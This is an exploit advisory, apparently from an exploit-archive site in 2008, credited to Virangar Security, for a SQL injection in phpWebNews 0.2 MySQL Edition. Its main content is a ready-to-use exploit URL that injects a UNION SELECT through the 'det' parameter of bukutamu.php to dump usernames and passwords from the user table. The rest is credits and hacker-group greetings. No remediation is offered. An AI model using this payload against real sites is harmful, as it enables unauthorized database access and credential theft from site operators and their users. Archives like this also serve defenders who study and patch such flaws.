[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability
# Published : 2008-07-03
# Author : Virangar Security
# Previous Title : phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability
# Next Title : pHNews CMS Multiple Local File Inclusion Vulnerabilities
#######################################################################################
#
# ...:::::phpwebnews-mysql 0.2 SQL Injection Vulnerability ::::....
#
#######################################################################################
Virangar Security Team
www.virangar.net
www.virangar.ir
=================================================================================
Discoverd By :virangar security team
User In Virangar : d4v00d_cr4ck3r
=================================================================================
Special TNX To:Mr.nosrati,H4di.H4di,black.shadowes,Mr.hesy,Zahra
& All virangar Members & All hackerz
=================================================================================
Download:
http://www.codewalkers.com/codefiles/476_phpwebnews-mysql.zip
=================================================================================
expl0it:
http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
=================================================================================
Young Iranian h4ck3rz
=================================================================================
# www.Syue.com [2008-07-03]